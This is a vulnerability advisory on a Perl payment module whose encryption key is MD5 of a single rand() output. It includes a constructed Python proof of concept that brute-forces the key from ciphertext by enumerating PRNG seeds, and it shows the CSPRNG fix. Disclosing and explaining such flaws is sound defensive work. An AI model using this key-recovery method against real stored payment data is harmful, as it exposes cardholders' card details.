Impact
Business::OnlinePayment::StoredTransaction derives its encryption key from a single call to Perl's built‑in rand function and an MD5 hash of the result. rand is not a cryptographically secure generator: its output is a deterministic function of a small seed and internal state, so the set of keys the module can ever produce is small enough to enumerate, and hashing that output with MD5 (itself not a cryptographic‑grade primitive) adds no entropy. An attacker who obtains the stored ciphertext can therefore recover the key by brute force, and with it decrypt or alter the credit card transaction data the key protects, compromising both confidentiality and integrity of payment information. The weakness maps to CWE‑338 (use of a cryptographically weak PRNG) and CWE‑693 (protection mechanism failure).
Affected Systems
The vulnerability affects the Perl module Business::OnlinePayment::StoredTransaction, all releases up to and including version 0.01. Any deployment that uses this module to store encrypted transaction data is affected, regardless of environment.
Risk and Exploitability
A CVSS score of 9.1 places this flaw in the highest severity band. The EPSS score of under 1% estimates a low probability of exploitation in the wild; it says nothing about impact, which remains severe when the flaw is exploited. The vulnerability is not listed in the CISA KEV catalog. An attacker needs access to the stored ciphertext (for example through a database dump, a backup, or code execution within the application that uses the module); from there the key can be reconstructed offline by enumerating the outputs rand could have produced, hashing each candidate with MD5 exactly as the module does, and testing the result against the ciphertext. The most likely attack vector is therefore compromise of, or code execution within, a web or payment application that imports this module, as inferred from the nature of the module.
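The key recovery described in the Impact and Risk sections above, as an added example (Python; not code from the module, the advisory or OpenCVE): it models the MD5(rand()) derivation, brute‑forces the key from the ciphertext alone by enumerating the PRNG seed, and contrasts that with a key drawn from the OS CSPRNG. The timestamp‑seeded random.Random standing in for rand(), the stringification of the rand() output before hashing, the HMAC‑based stream cipher and the sample card record are all assumptions or constructed stand‑ins, not the module's real PRNG, formatting, cipher or data.

```python
"""Added example, not code from Business::OnlinePayment::StoredTransaction.

Shows why a key derived as MD5(rand()) can be recovered by an attacker who
holds only the ciphertext, and contrasts it with a key from the OS CSPRNG.
Assumptions (all stand-ins): the PRNG is random.Random seeded from a creation
timestamp; rand() output is stringified with repr() before hashing; the cipher
is an HMAC-SHA256 keystream XOR that merely has to be key-dependent and
invertible.
"""
import hashlib
import hmac
import random
import secrets

# Constructed sample record in the shape an application might store:
# PAN|expiry|CVV. The PAN is a well-known test number, not a real card.
RECORD = b"4111111111111111|12/29|123"


def weak_key_from_rand(rand_value: float) -> bytes:
    """The flawed derivation: MD5 of a single PRNG output.
    How rand() is stringified before hashing is an assumption."""
    return hashlib.md5(repr(rand_value).encode()).digest()


def weak_key_from_seed(seed: int) -> bytes:
    """Model of rand() auto-seeded from low-entropy state (here a timestamp).
    Whatever the seed source, the key is a deterministic function of it, so
    the key space can never be larger than the seed space."""
    rng = random.Random(seed)  # stand-in for Perl's rand(), not the real PRNG
    return weak_key_from_rand(rng.random())


def stream_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in symmetric cipher: XOR with an HMAC-SHA256 keystream.
    Not the module's cipher; applying it twice with the same key decrypts."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        counter = (offset // 32).to_bytes(4, "big")
        keystream = hmac.new(key, counter, hashlib.sha256).digest()
        out.extend(a ^ b for a, b in zip(data[offset:offset + 32], keystream))
    return bytes(out)


def encrypt_record_weakly(record: bytes, created_at: int) -> bytes:
    """The vulnerable pattern: key = MD5(rand()), with rand seeded from
    something an attacker can bound (modelled as the creation time)."""
    return stream_xor(weak_key_from_seed(created_at), record)


def looks_like_card_record(plaintext: bytes) -> bool:
    """Structure check an attacker can apply without a known plaintext:
    16 digits followed by '|'. A wrong key yields pseudorandom bytes, which
    pass this test with probability (10/256)**16, so false positives are
    not a practical concern."""
    return (len(plaintext) > 16
            and plaintext[:16].isdigit()
            and plaintext[16:17] == b"|")


def recover_record(ciphertext: bytes, t_start: int, t_end: int):
    """Offline brute force: for every seed in the window, rebuild the candidate
    key exactly as the application did and test the resulting plaintext.
    Returns (seed, plaintext) on success, or None if no seed in the window
    produces a plausible record."""
    for seed in range(t_start, t_end + 1):
        candidate = stream_xor(weak_key_from_seed(seed), ciphertext)
        if looks_like_card_record(candidate):
            return seed, candidate
    return None


def encrypt_record_properly(record: bytes):
    """The fix: 256 bits straight from the OS CSPRNG. There is no seed to
    enumerate, so the brute force above has nothing to iterate over."""
    key = secrets.token_bytes(32)
    return key, stream_xor(key, record)


if __name__ == "__main__":
    created = 1_700_000_000  # constructed creation timestamp
    ct = encrypt_record_weakly(RECORD, created)
    # The attacker only knows the record was written within a 10-minute window.
    print("weak key  :", recover_record(ct, created - 300, created + 300))
    key, ct2 = encrypt_record_properly(RECORD)
    print("strong key:", recover_record(ct2, created - 300, created + 300))
```

The attacker never needs a known plaintext: payment records have enough structure that a decryption with the wrong key is immediately distinguishable from the right one. The window here is a few hundred seeds for clarity; in practice the bound is the PRNG's seed or state size, which for a non‑cryptographic generator is still small enough to search, whereas a key from the OS CSPRNG gives the search nothing to enumerate.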
OpenCVE Enrichment